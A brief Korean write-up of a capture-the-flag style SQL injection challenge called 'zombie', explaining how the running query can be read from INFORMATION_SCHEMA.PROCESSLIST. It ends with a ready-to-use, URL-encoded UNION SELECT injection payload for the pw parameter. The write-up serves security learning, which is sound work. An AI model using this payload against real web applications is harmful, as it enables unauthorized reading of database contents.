zombie
이 문제는 INFORMATION_SCHEMA.PROCESSLIST 테이블의 INFO 컬럼값에 실행 쿼리문 전체가 출력되는 것을 이용하는 문제다.
문자열 필터링 시 _ 문자가 필터링 되지 않고 있기 때문에 INFORMATION_SCHEMA.PROCESSLIST 테이블 사용이 가능했다.
아래와 같이 페이로드를 작성하여 pw 파라미터에 삽입 후 요청을 보내면 된다.
(공격 페이로드) ?pw=%27%20UNION%20SELECT%20SUBSTR(info,38,70)%20FROM%20INFORMATION_SCHEMA.PROCESSLIST%23
🐛.. 🐛.. 🐛..